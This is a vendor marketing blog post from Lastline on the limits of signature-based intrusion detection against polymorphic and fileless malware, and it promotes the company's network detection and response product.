What You Hate About Your IDPS – It Doesn’t Detect Enough

Detect Lateral Movement

One of the chief complaints our customers have about their legacy Intrusion Detection and Prevention Systems (IDPS) is that it floods their SOC with alerts.  However, IDPS shortcomings run deeper than this — too often they don’t detect enough. This problem has a lot to do with how IDPS products work in general, and the evolving threat landscape has contributed to the problem as well.

Let’s first look at how a traditional IDPS product works to understand why their detection is so weak.

IDPS Tools and Signature-Based Detection

Traditional IDPS tools use signature-based detection to detect a variety of cyber threats, including exploits targeting vulnerable systems and applications, malware, and phishing attacks. They do so via packet-level inspection, a process in which they compare the hash of a packet to the hash of a malicious packet. If there’s a match, the IDPS product triggers an alert and possibly blocks it depending on the configuration.

But IDPS don’t work as well as they once did. One reason is the increasing volume of new attacks. Every day, the AV-TEST Institute registers over 350,000 new “malicious programs” (malware) and “potentially unwanted applications (PUA)”. Many of these new versions utilize a range of techniques, including polymorphic code and packers, to create a new variant that evades detection from signature-based detection. We’ve seen this in our Global Threat Intelligence Network; about 60 percent of malware coming into our customers’ networks is unique and engineered to evade detection by signature-based IDPS.

Malware authors know that most security vendors don’t create a signature until they start getting samples of new malicious code from multiple customers. However, since so much malware is unique, most variants won’t achieve critical mass with a vendor and therefore will never have a signature created for it. Adding to the challenge is that most companies don’t have the time or expertise to create their own signatures, so they have no way to protect against these new threats.

In addition, there are types of advanced attacks that easily evade signature-based technology by targeting legitimate processes and applications, such as the PowerShell utility installed by default in Microsoft Windows. For example, fileless malware is a new threat category that does not rely on malicious files, meaning there is no signature to detect. Designed to avoid signature-based detection by IDPS products, fileless attacks grew by 265 percent in the first half of 2019.

How Organizations Can Protect Themselves

The developments described above illustrate why organizations need to move beyond relying on signature-based tools like IDPS for threat detection. This doesn’t mean they should get rid of their IDPS, however. IDPS technology still provides some value—for example, a well-configured and up-to-date IDPS is still an effective way to detect known threats that make up 40% of the malicious traffic we observe in our customers’ networks. In addition, many regulatory frameworks continue to require IDPS along with antivirus software and firewalls because they serve as a first line of defense against attacks.

IDPS is a key component that Lastline uses in its network detection and response (NDR) solution. It uses IDPS capabilities to detect known threats entering the network, and continuously updates its signatures to protect against new variations of known threats. The solution then applies both unsupervised machine learning and supervised machine learning to network traffic so that it can detect anomalous activity indicating unknown threats operating inside the network. Lastline’s NDR also uses file analysis to detect malicious behaviors in email and web content and correlates all malicious activity to eliminate false positives and low-fidelity alerts, thereby helping to relieve alert fatigue.

Learn More

Download 5 Things You Hate About Your IDPS to learn more about the shortcomings of IDPS.

Download our Solution Guide to read about how to replace your ineffective IDPS with Lastline Defender.

Patrick Bedwell

Patrick Bedwell

Patrick Bedwell has been creating and executing product marketing strategies for network security products for almost 20 years. He earned his BA from Cal Berkeley, and his MBA from Santa Clara University.
Patrick Bedwell